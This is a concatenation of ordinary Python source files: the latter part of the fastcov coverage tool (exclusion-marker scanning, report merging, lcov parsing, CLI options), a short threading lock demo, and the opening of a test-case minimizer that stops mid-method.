            platform default (None means no fallbacks).
    """
    # BUG FIX: the original used a mutable default argument (fallback_encodings=[]).
    # It was only ever read, but the shared-default pitfall is best avoided outright.
    fallback_encodings = list(fallback_encodings) if fallback_encodings else []
    default_encoding = sys.getdefaultencoding()
    for encoding in [default_encoding] + fallback_encodings:
        try:
            with open(source, encoding=encoding) as f:
                return f.readlines()
        except UnicodeDecodeError:
            pass
    # Last resort: read with the default encoding, silently dropping undecodable bytes.
    logging.warning("Could not decode '{}' with {} or fallback encodings ({}); ignoring errors".format(source, default_encoding, ",".join(fallback_encodings)))
    with open(source, errors="ignore") as f:
        return f.readlines()
# Returns whether source coverage changed or not
def exclProcessSource(fastcov_sources, source, exclude_branches_sw, include_branches_sw, fallback_encodings):
    """Scan one source file for LCOV exclusion markers and prune its coverage in place.

    Returns False only when the file contains no "LCOV_EXCL" text and no
    branch start-with filters apply; otherwise returns True (coverage may
    have been modified).
    """
    # Before doing any work, check if this file even needs to be processed
    if not exclude_branches_sw and not include_branches_sw:
        # Ignore unencodable characters
        with open(source, errors="ignore") as f:
            if "LCOV_EXCL" not in f.read():
                return False
    # If we've made it this far we have to check every line
    start_line = 0
    end_line = 0
    # Start enumeration at line 1 because the first line of the file is line 1 not 0
    for i, line in enumerate(getSourceLines(source, fallback_encodings), 1):
        # Cycle through test names (likely only 1)
        for test_name in fastcov_sources[source]:
            fastcov_data = fastcov_sources[source][test_name]
            # Check if branch coverage should be deleted based on CLI options
            if (exclude_branches_sw or include_branches_sw) and (i in fastcov_data["branches"]):
                del_exclude_br = exclude_branches_sw and any(line.lstrip().startswith(e) for e in exclude_branches_sw)
                del_include_br = include_branches_sw and all(not line.lstrip().startswith(e) for e in include_branches_sw)
                if del_exclude_br or del_include_br:
                    del fastcov_data["branches"][i]
            # Skip to next line as soon as possible
            if "LCOV_EXCL" not in line:
                continue
            # Build line to function dict so can quickly delete by line number
            line_to_func = {}
            for f in fastcov_data["functions"].keys():
                l = fastcov_data["functions"][f]["start_line"]
                if l not in line_to_func:
                    line_to_func[l] = set()
                line_to_func[l].add(f)
            if "LCOV_EXCL_LINE" in line:
                # Drop line/branch coverage for this one line, plus any function starting here.
                for key in ["lines", "branches"]:
                    if i in fastcov_data[key]:
                        del fastcov_data[key][i]
                if i in line_to_func:
                    for key in line_to_func[i]:
                        if key in fastcov_data["functions"]:
                            del fastcov_data["functions"][key]
            elif "LCOV_EXCL_START" in line:
                start_line = i
            elif "LCOV_EXCL_STOP" in line:
                end_line = i
                if not start_line:
                    # STOP without a matching START - ignore the marker.
                    end_line = 0
                    continue
                # Drop all line/branch coverage inside the START..STOP range (inclusive).
                for key in ["lines", "branches"]:
                    for line_num in list(fastcov_data[key].keys()):
                        if start_line <= line_num <= end_line:
                            del fastcov_data[key][line_num]
                # NOTE(review): range(start_line, end_line) excludes end_line itself,
                # so a function starting on the STOP line is kept -- confirm intended.
                for line_num in range(start_line, end_line):
                    if line_num in line_to_func:
                        for key in line_to_func[line_num]:
                            if key in fastcov_data["functions"]:
                                del fastcov_data["functions"][key]
                start_line = end_line = 0
            elif "LCOV_EXCL_BR_LINE" in line:
                if i in fastcov_data["branches"]:
                    del fastcov_data["branches"][i]
    # Source coverage changed
    return True
def exclMarkerWorker(data_q, fastcov_sources, chunk, exclude_branches_sw, include_branches_sw, fallback_encodings):
    """Worker process: scan a chunk of source files for exclusion markers.

    Sends a list of (source, coverage) pairs for every file whose coverage
    changed back to the parent via data_q, then exits with EXIT_CODE.
    """
    changed_sources = []
    for source in chunk:
        try:
            if exclProcessSource(fastcov_sources, source, exclude_branches_sw, include_branches_sw, fallback_encodings):
                changed_sources.append((source, fastcov_sources[source]))
        except FileNotFoundError:
            logging.error("Could not find '%s' to scan for exclusion markers...", source)
            setExitCode("excl_not_found") # Set exit code because of error
    # Write out changed sources back to main fastcov file
    data_q.put(changed_sources)
    # Exit current process with appropriate code
    sys.exit(EXIT_CODE)
def processExclusionMarkers(fastcov_json, jobs, exclude_branches_sw, include_branches_sw, min_chunk_size, fallback_encodings):
    """Scan all report sources for exclusion markers in parallel and fold changes back in."""
    # Each worker gets at least min_chunk_size files; +1 rounds the division up.
    chunk_size = max(min_chunk_size, int(len(fastcov_json["sources"]) / jobs) + 1)
    processes = []
    data_q = multiprocessing.Queue()
    for chunk in chunks(list(fastcov_json["sources"].keys()), chunk_size):
        p = multiprocessing.Process(target=exclMarkerWorker, args=(data_q, fastcov_json["sources"], chunk, exclude_branches_sw, include_branches_sw, fallback_encodings))
        processes.append(p)
        p.start()
    logging.info("Spawned {} exclusion marker scanning processes, each processing at most {} source files".format(len(processes), chunk_size))
    # Drain the queue before join()ing: a child using a Queue may not exit
    # until its queued data has been consumed.
    changed_sources = []
    for p in processes:
        changed_sources += data_q.get()
    for p in processes:
        p.join()
        if p.exitcode != 0:
            setExitCodeRaw(p.exitcode)
    # Workers operate on copies (separate processes), so apply their changes here.
    for changed_source in changed_sources:
        fastcov_json["sources"][changed_source[0]] = changed_source[1]
def validateSources(fastcov_json):
    """Log an error for every report source that does not exist on disk."""
    logging.info("Checking if all sources exist")
    missing = (s for s in fastcov_json["sources"] if not os.path.exists(s))
    for source in missing:
        logging.error("Cannot find '{}'".format(source))
def distillFunction(function_raw, functions):
    """Merge one raw gcov function record into the aggregated functions dict."""
    name = function_raw["name"]
    # NOTE: need to explicitly cast all counts coming from gcov to int - this is because gcov's json library
    # will pass as scientific notation (i.e. 12+e45)
    hits = int(function_raw["execution_count"])
    if name in functions:
        functions[name]["execution_count"] += hits
    else:
        functions[name] = {
            "start_line": int(function_raw["start_line"]),
            "execution_count": hits,
        }
def emptyBranchSet(branch1, branch2):
    """Return True when neither branch in the pair was ever taken."""
    return branch1["count"] == 0 == branch2["count"]
def matchingBranchSet(branch1, branch2):
    """Return True when both branches in the pair have identical hit counts."""
    first, second = branch1["count"], branch2["count"]
    return first == second
def filterExceptionalBranches(branches):
    """Filter gcov's exceptional-branch noise from a line's branch list.

    Branches are processed in pairs; a pair whose second member is a throw
    branch is dropped entirely. If, after seeing a throw branch, an untaken
    pair follows two kept branches with matching counts, the whole line is
    treated as initializer-list noise and an empty list is returned.
    """
    filtered_branches = []
    exception_branch = False
    for i in range(0, len(branches), 2):
        # Odd leftover branch at the end of the list: keep it as-is.
        if i+1 >= len(branches):
            filtered_branches.append(branches[i])
            break
        # Filter exceptional branch noise
        if branches[i+1]["throw"]:
            exception_branch = True
            continue
        # Filter initializer list noise
        if exception_branch and emptyBranchSet(branches[i], branches[i+1]) and len(filtered_branches) >= 2 and matchingBranchSet(filtered_branches[-1], filtered_branches[-2]):
            return []
        filtered_branches.append(branches[i])
        filtered_branches.append(branches[i+1])
    return filtered_branches
def distillLine(line_raw, lines, branches, include_exceptional_branches):
    """Merge one raw gcov line record into the aggregated line and branch dicts."""
    line_number = int(line_raw["line_number"])
    execution_count = int(line_raw["count"])
    lines[line_number] = lines.get(line_number, 0) + execution_count
    # Filter out exceptional branches by default unless requested otherwise
    if not include_exceptional_branches:
        line_raw["branches"] = filterExceptionalBranches(line_raw["branches"])
    # Increment all branch counts
    raw_branches = line_raw["branches"]
    if raw_branches and line_number not in branches:
        branches[line_number] = []
    for index, branch in enumerate(raw_branches):
        counts = branches[line_number]
        # Grow the aggregate list if this record has more branches than before.
        if len(counts) < len(raw_branches):
            counts += [0] * (len(raw_branches) - len(counts))
        counts[index] += int(branch["count"])
def distillSource(source_raw, sources, test_name, include_exceptional_branches):
    """Fold one processed gcov record into the aggregated sources report."""
    source_name = source_raw["file_abs"]
    if source_name not in sources:
        sources[source_name] = {
            test_name: {
                "functions": {},
                "branches": {},
                "lines": {}
            }
        }
    data = sources[source_name][test_name]
    for function in source_raw["functions"]:
        distillFunction(function, data["functions"])
    for line in source_raw["lines"]:
        distillLine(line, data["lines"], data["branches"], include_exceptional_branches)
def dumpToJson(intermediate, output):
    """Serialize the report dict to the given path as JSON."""
    with open(output, "w") as out_file:
        json.dump(intermediate, out_file)
def getGcovFilterOptions(args):
    """Bundle the CLI filtering options into the dict shape the filter helpers expect."""
    return {
        "sources": {os.path.abspath(s) for s in args.sources}, #Make paths absolute, use set for fast lookups
        "include": args.includepost,
        "exclude": args.excludepost,
        "exclude_glob": args.excludepost_glob
    }
def addDicts(dict1, dict2):
    """Add dicts together by value. i.e. addDicts({"a":1,"b":0}, {"a":2}) == {"a":3,"b":0}."""
    combined = dict(dict1)
    for key, value in dict2.items():
        combined[key] = combined.get(key, 0) + value
    return combined
def addLists(list1, list2):
    """Add lists together by value. i.e. addLists([1,1], [2,2]) == [3,3]."""
    # Overlay the shorter list onto a copy of the longer one.
    if len(list1) <= len(list2):
        shorter, longer = list1, list2
    else:
        shorter, longer = list2, list1
    summed = list(longer)
    for index, value in enumerate(shorter):
        summed[index] += value
    return summed
def combineReports(base, overlay):
    """Merge coverage from `overlay` into `base` in place.

    New sources/test names are adopted wholesale; overlapping ones have their
    line, branch, and function counts summed.
    """
    for source, scov in overlay["sources"].items():
        # Combine Source Coverage
        if source not in base["sources"]:
            base["sources"][source] = scov
            continue
        for test_name, tcov in scov.items():
            # Combine Source Test Name Coverage
            if test_name not in base["sources"][source]:
                base["sources"][source][test_name] = tcov
                continue
            # Drill down and create convenience variable
            base_data = base["sources"][source][test_name]
            # Combine Line Coverage
            base_data["lines"] = addDicts(base_data["lines"], tcov["lines"])
            # Combine Branch Coverage
            for branch, cov in tcov["branches"].items():
                if branch not in base_data["branches"]:
                    base_data["branches"][branch] = cov
                else:
                    base_data["branches"][branch] = addLists(base_data["branches"][branch], cov)
            # Combine Function Coverage
            for function, cov in tcov["functions"].items():
                if function not in base_data["functions"]:
                    base_data["functions"][function] = cov
                else:
                    base_data["functions"][function]["execution_count"] += cov["execution_count"]
def parseInfo(path):
    """Parse an lcov .info file into fastcov json."""
    fastcov_json = {
        "sources": {}
    }
    with open(path) as f:
        for line in f:
            if line.startswith("TN:"):
                # assumes every SF record is preceded by a TN record -- TODO confirm,
                # otherwise current_test_name is unbound below
                current_test_name = line[3:].strip()
            elif line.startswith("SF:"):
                current_sf = line[3:].strip()
                fastcov_json["sources"][current_sf] = {
                    current_test_name: {
                        "functions": {},
                        "branches": {},
                        "lines": {},
                    }
                }
                current_data = fastcov_json["sources"][current_sf][current_test_name]
            elif line.startswith("FN:"):
                # FN:<start line>,<function name>
                line_num, function_name = line[3:].strip().split(",")
                current_data["functions"][function_name] = {}
                current_data["functions"][function_name]["start_line"] = int(line_num)
            elif line.startswith("FNDA:"):
                # FNDA:<execution count>,<function name>
                count, function_name = line[5:].strip().split(",")
                current_data["functions"][function_name]["execution_count"] = int(count)
            elif line.startswith("DA:"):
                # DA:<line>,<count>; keys stay strings here - convertKeysToInt fixes them later.
                line_num, count = line[3:].strip().split(",")
                current_data["lines"][line_num] = int(count)
            elif line.startswith("BRDA:"):
                # BRDA:<line>,<block>,<branch>,<taken>; only line and taken are kept.
                # NOTE(review): lcov allows '-' for <taken>; int() would raise here - confirm inputs.
                branch_tokens = line[5:].strip().split(",")
                line_num, count = branch_tokens[0], branch_tokens[-1]
                if line_num not in current_data["branches"]:
                    current_data["branches"][line_num] = []
                current_data["branches"][line_num].append(int(count))
    return fastcov_json
def convertKeysToInt(report):
    """Coerce line-number keys (strings after text parsing) back to int, in place."""
    for source_data in report["sources"].values():
        for test_data in source_data.values():
            test_data["lines"] = {int(line): hits for line, hits in test_data["lines"].items()}
            test_data["branches"] = {int(line): counts for line, counts in test_data["branches"].items()}
def parseAndCombine(paths):
    """Load each report (.json or .info) and fold them into a single base report."""
    base_report = {}
    for path in paths:
        if path.endswith(".json"):
            with open(path) as f:
                report = json.load(f)
        elif path.endswith(".info"):
            report = parseInfo(path)
        else:
            logging.error("Currently only fastcov .json and lcov .info supported for combine operations, aborting due to %s...\n", path)
            sys.exit(EXIT_CODES["unsupported_coverage_format"])
        # In order for sorting to work later when we serialize,
        # make sure integer keys are int
        convertKeysToInt(report)
        if not base_report:
            # First successfully parsed report becomes the merge target.
            base_report = report
            logging.info("Setting {} as base report".format(path))
        else:
            combineReports(base_report, report)
            logging.info("Adding {} to base report".format(path))
    return base_report
def getCombineCoverage(args):
    """Combine the user-supplied coverage reports, then apply post filters."""
    logging.info("Performing combine operation")
    combined = parseAndCombine(args.combine)
    filterFastcov(combined, args)
    return combined
def getGcovCoverage(args):
    """Drive the gcov pipeline: find coverage files, run gcov workers, distill results."""
    # Need at least python 3.5 because of use of recursive glob
    checkPythonVersion(sys.version_info[0:2])
    # Need at least gcov 9.0.0 because that's when gcov JSON and stdout streaming was introduced
    checkGcovVersion(getGcovVersion(args.gcov))
    # Get list of gcda files to process
    coverage_files = findCoverageFiles(args.directory, args.coverage_files, args.use_gcno)
    # If gcda/gcno filtering is enabled, filter them out now
    if args.excludepre:
        coverage_files = getFilteredCoverageFiles(coverage_files, args.excludepre)
        logging.info("Found {} coverage files after filtering".format(len(coverage_files)))
    # We "zero" the "counters" by simply deleting all gcda files
    if args.zerocounters:
        removeFiles(globCoverageFiles(args.directory, GCOV_GCDA_EXT))
        # NOTE(review): this logs len(coverage_files), not the number of files
        # actually removed by the glob above - confirm intended.
        logging.info("Removed {} .gcda files".format(len(coverage_files)))
        sys.exit()
    # Fire up one gcov per cpu and start processing gcdas
    gcov_filter_options = getGcovFilterOptions(args)
    fastcov_json = processGcdas(args, coverage_files, gcov_filter_options)
    # Summarize processing results
    logging.info("Processed {} .gcov files ({} total, {} skipped)".format(GCOVS_TOTAL - GCOVS_SKIPPED, GCOVS_TOTAL, GCOVS_SKIPPED))
    logging.debug("Final report will contain coverage for the following %d source files:\n %s", len(fastcov_json["sources"]), "\n ".join(fastcov_json["sources"]))
    return fastcov_json
def formatCoveredItems(covered, total):
    """Format a coverage ratio as '<pct>%, covered/total' (an empty total counts as fully covered)."""
    if total > 0:
        percent = round((covered * 100.0) / total, 2)
    else:
        percent = 100.0
    return "{:.2f}%, {}/{}".format(percent, covered, total)
def dumpStatistic(fastcov_json):
    """Log file/function/line coverage totals for the final report."""
    total_lines = covered_lines = 0
    total_functions = covered_functions = 0
    covered_files = 0
    total_files = len(fastcov_json["sources"])
    for source in fastcov_json["sources"].values():
        file_has_hits = False
        for test in source.values():
            total_lines += len(test["lines"])
            total_functions += len(test["functions"])
            for hits in test["lines"].values():
                if hits > 0:
                    covered_lines += 1
                    file_has_hits = True
            for function in test["functions"].values():
                if function['execution_count'] > 0:
                    covered_functions += 1
                    file_has_hits = True
        if file_has_hits:
            covered_files += 1
    logging.info("Files Coverage: {}".format(formatCoveredItems(covered_files, total_files)))
    logging.info("Functions Coverage: {}".format(formatCoveredItems(covered_functions, total_functions)))
    logging.info("Lines Coverage: {}".format(formatCoveredItems(covered_lines, total_lines)))
def dumpFile(fastcov_json, args):
    """Write the final report to args.output in the user-selected format."""
    if args.lcov:
        dumpToLcovInfo(fastcov_json, args.output)
        logging.info("Created lcov info file '{}'".format(args.output))
    else:
        dumpToJson(fastcov_json, args.output)
        logging.info("Created fastcov json file '{}'".format(args.output))
    # Optionally log aggregate coverage statistics after writing.
    if args.dump_statistic:
        dumpStatistic(fastcov_json)
def tupleToDotted(tup):
    """Render a version tuple like (1, 2, 3) as '1.2.3'."""
    return ".".join(str(part) for part in tup)
def parseArgs():
    """Define and parse the fastcov command line, defaulting the output filename by format."""
    parser = argparse.ArgumentParser(description='A parallel gcov wrapper for fast coverage report generation')
    parser.add_argument('-z', '--zerocounters', dest='zerocounters', action="store_true", help='Recursively delete all gcda files')
    # Enable Branch Coverage
    parser.add_argument('-b', '--branch-coverage', dest='branchcoverage', action="store_true", help='Include only the most useful branches in the coverage report.')
    parser.add_argument('-B', '--exceptional-branch-coverage', dest='xbranchcoverage', action="store_true", help='Include ALL branches in the coverage report (including potentially noisy exceptional branches).')
    parser.add_argument('-A', '--exclude-br-lines-starting-with', dest='exclude_branches_sw', nargs="+", metavar='', default=[], help='Exclude branches from lines starting with one of the provided strings (i.e. assert, return, etc.)')
    parser.add_argument('-a', '--include-br-lines-starting-with', dest='include_branches_sw', nargs="+", metavar='', default=[], help='Include only branches from lines starting with one of the provided strings (i.e. if, else, while, etc.)')
    parser.add_argument('-X', '--skip-exclusion-markers', dest='skip_exclusion_markers', action="store_true", help='Skip reading source files to search for lcov exclusion markers (such as "LCOV_EXCL_LINE")')
    parser.add_argument('-x', '--scan-exclusion-markers', dest='scan_exclusion_markers', action="store_true", help='(Combine operations) Force reading source files to search for lcov exclusion markers (such as "LCOV_EXCL_LINE")')
    # Capture untested file coverage as well via gcno
    parser.add_argument('-n', '--process-gcno', dest='use_gcno', action="store_true", help='Process both gcno and gcda coverage files. This option is useful for capturing untested files in the coverage report.')
    # Filtering Options
    parser.add_argument('-s', '--source-files', dest='sources', nargs="+", metavar='', default=[], help='Filter: Specify exactly which source files should be included in the final report. Paths must be either absolute or relative to current directory.')
    parser.add_argument('-e', '--exclude', dest='excludepost', nargs="+", metavar='', default=[], help='Filter: Exclude source files from final report if they contain one of the provided substrings (i.e. /usr/include test/, etc.)')
    parser.add_argument('-eg', '--exclude-glob', dest='excludepost_glob', nargs="+", metavar='', default=[], help='Filter: Exclude source files by glob pattern from final report if they contain one of the provided substrings (i.e. /usr/include test/, etc.)')
    parser.add_argument('-i', '--include', dest='includepost', nargs="+", metavar='', default=[], help='Filter: Only include source files in final report that contain one of the provided substrings (i.e. src/ etc.)')
    parser.add_argument('-f', '--gcda-files', dest='coverage_files', nargs="+", metavar='', default=[], help='Filter: Specify exactly which gcda or gcno files should be processed. Note that specifying gcno causes both gcno and gcda to be processed.')
    parser.add_argument('-E', '--exclude-gcda', dest='excludepre', nargs="+", metavar='', default=[], help='Filter: Exclude gcda or gcno files from being processed via simple find matching (not regex)')
    parser.add_argument('-u', '--diff-filter', dest='diff_file', default='', help='Unified diff file with changes which will be included into final report')
    parser.add_argument('-ub', '--diff-base-dir', dest='diff_base_dir', default='', help='Base directory for sources in unified diff file, usually repository dir')
    parser.add_argument('-g', '--gcov', dest='gcov', default='gcov', help='Which gcov binary to use')
    parser.add_argument('-d', '--search-directory', dest='directory', default=".", help='Base directory to recursively search for gcda files (default: .)')
    parser.add_argument('-c', '--compiler-directory', dest='cdirectory', default="", help='Base directory compiler was invoked from (default: . or read from gcov) \
                        This needs to be set if invoking fastcov from somewhere other than the base compiler directory. No need to set it if gcc version > 9.1')
    parser.add_argument('-j', '--jobs', dest='jobs', type=int, default=multiprocessing.cpu_count(), help='Number of parallel gcov to spawn (default: {}).'.format(multiprocessing.cpu_count()))
    parser.add_argument('-m', '--minimum-chunk-size', dest='minimum_chunk', type=int, default=5, help='Minimum number of files a thread should process (default: 5). \
                        If you have only 4 gcda files but they are monstrously huge, you could change this value to a 1 so that each thread will only process 1 gcda. Otherwise fastcov will spawn only 1 thread to process all of them.')
    parser.add_argument('-F', '--fallback-encodings', dest='fallback_encodings', nargs="+", metavar='', default=[], help='List of encodings to try if opening a source file with the default fails (i.e. latin1, etc.). This option is not usually needed.')
    parser.add_argument('-l', '--lcov', dest='lcov', action="store_true", help='Output in lcov info format instead of fastcov json')
    parser.add_argument('-o', '--output', dest='output', default="", help='Name of output file (default: coverage.json or coverage.info, depends on --lcov option)')
    parser.add_argument('-q', '--quiet', dest='quiet', action="store_true", help='Suppress output to stdout')
    parser.add_argument('-t', '--test-name', dest='test_name', default="", help='Specify a test name for the coverage. Equivalent to lcov\'s `-t`.')
    parser.add_argument('-C', '--add-tracefile', dest='combine', nargs="+", help='Combine multiple coverage files into one. If this flag is specified, fastcov will do a combine operation instead invoking gcov. Equivalent to lcov\'s `-a`.')
    parser.add_argument('-V', '--verbose', dest="verbose", action="store_true", help="Print more detailed information about what fastcov is doing")
    parser.add_argument('-w', '--validate-sources', dest="validate_sources", action="store_true", help="Check if every source file exists")
    parser.add_argument('-p', '--dump-statistic', dest="dump_statistic", action="store_true", help="Dump total statistic at the end")
    parser.add_argument('-v', '--version', action="version", version='%(prog)s {version}'.format(version=__version__), help="Show program's version number and exit")
    args = parser.parse_args()
    # Pick the output filename to match the chosen format when none was given.
    if not args.output:
        args.output = 'coverage.info' if args.lcov else 'coverage.json'
    return args
def checkPythonVersion(version):
    """Exit if the provided python version is less than the supported version."""
    if version >= MINIMUM_PYTHON:
        return
    sys.stderr.write("Minimum python version {} required, found {}\n".format(tupleToDotted(MINIMUM_PYTHON), tupleToDotted(version)))
    sys.exit(EXIT_CODES["python_version"])
def checkGcovVersion(version):
    """Exit if the provided gcov version is less than the supported version."""
    if version >= MINIMUM_GCOV:
        return
    sys.stderr.write("Minimum gcov version {} required, found {}\n".format(tupleToDotted(MINIMUM_GCOV), tupleToDotted(version)))
    sys.exit(EXIT_CODES["gcov_version"])
def setupLogging(quiet, verbose):
    """Configure the root logger: INFO by default, DEBUG when verbose, left disabled when quiet."""
    stream_handler = logging.StreamHandler()
    stream_handler.setFormatter(FastcovFormatter("[%(levelname)s]: %(message)s"))
    root_logger = logging.getLogger()
    root_logger.setLevel(logging.DEBUG if verbose else logging.INFO)
    root_logger.addHandler(stream_handler)
    if not quiet:
        logging.disable(level=logging.NOTSET) # Re-enable logging
def main():
    """CLI entry point: gather coverage, post-process it, and write the report."""
    args = parseArgs()
    # Setup logging
    setupLogging(args.quiet, args.verbose)
    # Get report from appropriate source
    if args.combine:
        fastcov_json = getCombineCoverage(args)
        # Combine operations only rescan sources when explicitly requested via -x.
        skip_exclusion_markers = not args.scan_exclusion_markers
    else:
        fastcov_json = getGcovCoverage(args)
        skip_exclusion_markers = args.skip_exclusion_markers
    # Scan for exclusion markers
    if not skip_exclusion_markers:
        processExclusionMarkers(fastcov_json, args.jobs, args.exclude_branches_sw, args.include_branches_sw, args.minimum_chunk, args.fallback_encodings)
        logging.info("Scanned {} source files for exclusion markers".format(len(fastcov_json["sources"])))
    # Restrict the report to lines touched by a unified diff, if one was provided.
    if args.diff_file:
        logging.info("Filtering according to {} file".format(args.diff_file))
        DiffParser().filterByDiff(args.diff_file, args.diff_base_dir, fastcov_json, args.fallback_encodings)
    if args.validate_sources:
        validateSources(fastcov_json)
    # Dump to desired file format
    dumpFile(fastcov_json, args)
    # If there was an error along the way, but we still completed the pipeline...
    if EXIT_CODE:
        sys.exit(EXIT_CODE)
# Set package version... it's way down here so that we can call tupleToDotted
__version__ = tupleToDotted(FASTCOV_VERSION)
# Standard entry-point guard so importing this module has no side effects.
if __name__ == '__main__':
    main()
|
lock.py | #!/usr/bin/env python
# encoding: UTF-8
import threading
import time
data=0
lock=threading.Lock()
def func():
    """Increment the shared counter `data` while holding the global lock.

    BUG FIX: the original used Python 2 `print '...'` statements (a
    SyntaxError on Python 3) and released the lock manually, so an exception
    between acquire() and release() would leave it held forever. `with lock:`
    guarantees release on every exit path.
    """
    global data
    print('%s acquire lock...' % threading.currentThread().getName())
    with lock:
        print('%s get the lock.' % threading.currentThread().getName())
        data += 1
        time.sleep(2)
        print('%s release lock...' % threading.currentThread().getName())
# Spawn three workers that contend for the same lock; each will block in turn.
t1=threading.Thread(target=func)
t2=threading.Thread(target=func)
t3=threading.Thread(target=func)
t1.start()
t2.start()
t3.start()
|
minimizer.py | # Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base classes for other minimizers."""
import copy
import functools
import os
import tempfile
import time
import threading
import errors
# Tunables for minimization throughput.
DEFAULT_CLEANUP_INTERVAL = 20
DEFAULT_THREAD_COUNT = 8
DEFAULT_TESTS_PER_THREAD = 4
MAX_MERGE_BATCH_SIZE = 32
# Seconds between progress reports during long minimization runs.
PROGRESS_REPORT_INTERVAL = 300
class DummyLock(object):
    """Dummy to replace threading.Lock for single-threaded tests.

    Instances are falsy so callers can distinguish a dummy from a real lock.
    """

    def __enter__(self):
        # No-op: nothing to acquire in single-threaded mode.
        pass

    def __exit__(self, exec_type, value, traceback):
        # No-op: nothing to release.
        pass

    def __bool__(self):
        # BUG FIX: Python 3 uses __bool__, not __nonzero__; without this the
        # instance would be truthy on Python 3, defeating the falsy contract.
        return False

    # Python 2 compatibility alias (bool() consulted __nonzero__ there).
    __nonzero__ = __bool__
class TestQueue(object):
    """Queue to store commands that should be executed to test hypotheses.

    Thread-safe: all queue mutations happen under an internal lock.
    """

    def __init__(self,
                 thread_count,
                 deadline_check=None,
                 progress_report_function=None,
                 per_thread_cleanup_function=None):
        """Args:
            thread_count: number of worker threads process() spawns per round.
            deadline_check: optional callable; a truthy soft check aborts work.
            progress_report_function: optional callable invoked while waiting.
            per_thread_cleanup_function: optional callable run after each test.
        """
        self.thread_count = thread_count
        self.deadline_check = deadline_check
        self.progress_report_function = progress_report_function
        self.per_thread_cleanup_function = per_thread_cleanup_function
        self.lock = threading.Lock()
        self.queue = []

    def _pop(self):
        """Pull a single hypothesis to process from the queue."""
        with self.lock:
            if not self.queue:
                return None
            return self.queue.pop(0)

    def _work(self):
        """Process items from the queue until it is empty."""
        while not self.deadline_check or not self.deadline_check(soft_check=True):
            current_item = self._pop()
            if not current_item:
                break
            test, test_function, completion_callback, should_run = current_item  # pylint: disable=unpacking-non-sequence
            if not should_run():
                continue
            result = test_function(test)
            completion_callback(result)
            if self.per_thread_cleanup_function:
                self.per_thread_cleanup_function()
            # Abort if we have exceeded the deadline for this operation.
            if self.deadline_check and self.deadline_check(soft_check=True):
                break

    def _cleanup(self):
        """Clean up the queue to be sure that no more tasks will be executed."""
        with self.lock:
            self.queue = []

    def push(self,
             test,
             test_function,
             completion_callback,
             should_run=lambda: True):
        """Add a test to the queue and a callback to run on completion."""
        with self.lock:
            self.queue.append((test, test_function, completion_callback, should_run))

    def force(self,
              test,
              test_function,
              completion_callback,
              should_run=lambda: True):
        """Force a test to the front of the queue."""
        entry = (test, test_function, completion_callback, should_run)
        with self.lock:
            self.queue.insert(0, entry)

    def size(self):
        """Return the number of unprocessed tasks in the queue."""
        return len(self.queue)

    def process(self):
        """Process all tests in the queue and block until completion."""
        while self.queue:
            # BUG FIX: `xrange` is Python 2 only and raises NameError on
            # Python 3; `range` is the correct spelling on both lines here.
            threads = [
                threading.Thread(target=self._work) for _ in range(self.thread_count)
            ]
            for thread in threads:
                thread.start()
            while any(thread.is_alive() for thread in threads):
                if self.deadline_check:
                    self.deadline_check(cleanup_function=self._cleanup)
                if self.progress_report_function:
                    self.progress_report_function()
                time.sleep(1)
class Testcase(object):
  """Single test case to be minimized.

  Holds the tokenized test data, tracks which tokens are still required,
  caches already-tested hypotheses, and coordinates (optionally
  multithreaded) testing of "hypotheses" -- collections of token indices
  that may be removable from the test case.
  """

  def __init__(self, data, minimizer):
    self.minimizer = minimizer
    if minimizer.tokenize:
      self.tokens = minimizer.tokenizer(data)
    else:
      self.tokens = data
    # required_tokens[i] is flipped to False once token i is proven removable.
    self.required_tokens = [True] * len(self.tokens)
    self.tested_hypotheses = set()
    self.unmerged_failing_hypotheses = []
    self.tests_to_queue = []
    self.currently_processing = False
    self.last_progress_report_time = 0
    self.runs_since_last_cleanup = 0
    if minimizer.max_threads > 1:
      self.test_queue = TestQueue(
          minimizer.max_threads,
          deadline_check=self._deadline_exceeded,
          progress_report_function=self._report_progress)
      self.merge_preparation_lock = threading.Lock()
      self.merge_lock = threading.Lock()
      self.cache_lock = threading.Lock()
      self.tests_to_queue_lock = threading.Lock()
    else:
      # Single-threaded mode: no queue, and DummyLock objects make the lock
      # acquisitions below no-ops.
      self.test_queue = None
      self.merge_preparation_lock = DummyLock()
      self.merge_lock = DummyLock()
      self.cache_lock = DummyLock()
      self.tests_to_queue_lock = DummyLock()

  def __str__(self):
    """Return the string form of the minimized test case (at this point)."""
    return self.minimizer.token_combiner(self.get_required_tokens())

  # Helper functions based on minimizer configuration.
  def _deadline_exceeded(self, cleanup_function=None, soft_check=False):
    """Check to see if we have exceeded the deadline for execution."""
    if self.minimizer.deadline and time.time() > self.minimizer.deadline:
      if soft_check:
        return True

      # If we are here, we have exceeded the deadline on a hard check. Clean up.
      if cleanup_function:
        cleanup_function()
      if self.minimizer.cleanup_function:
        self.minimizer.cleanup_function()

      # Raise an exception if this is not a soft deadline check.
      raise errors.MinimizationDeadlineExceededError(self)

    return False

  def _delete_file_if_needed(self, input_file):
    """Deletes a temporary file if necessary."""
    # If we are not running in a mode where we need to delete files, do nothing.
    if not self.minimizer.tokenize or not self.minimizer.delete_temp_files:
      return
    try:
      os.remove(input_file)
    except OSError:
      # Best-effort cleanup; the file may already be gone.
      pass

  def _report_progress(self):
    """Call a function to report progress if the minimizer uses one."""
    if not self.minimizer.progress_report_function:
      return
    # Throttle reports to at most one per PROGRESS_REPORT_INTERVAL seconds.
    if time.time() - self.last_progress_report_time < PROGRESS_REPORT_INTERVAL:
      return
    self.last_progress_report_time = time.time()
    message = '%d/%d tokens remaining.' % (len(self.get_required_tokens()),
                                           len(self.required_tokens))
    self.minimizer.progress_report_function(message)

  # Functions used when preparing tests.
  def _range_complement(self, current_range):
    """Return required tokens in the complement of the specified range."""
    # NOTE: xrange implies Python 2; this would raise NameError on Python 3.
    result = xrange(len(self.tokens))
    to_remove = set(current_range)
    return [i for i in result if i not in to_remove and self.required_tokens[i]]

  def _prepare_test_input(self, tokens, tested_tokens):
    """Write the tokens currently being tested to a temporary file."""
    tested_tokens = set(tested_tokens)
    current_tokens = [t for i, t in enumerate(tokens) if i in tested_tokens]
    if not self.minimizer.tokenize:
      # Not file-based; hand back the token list directly.
      return current_tokens
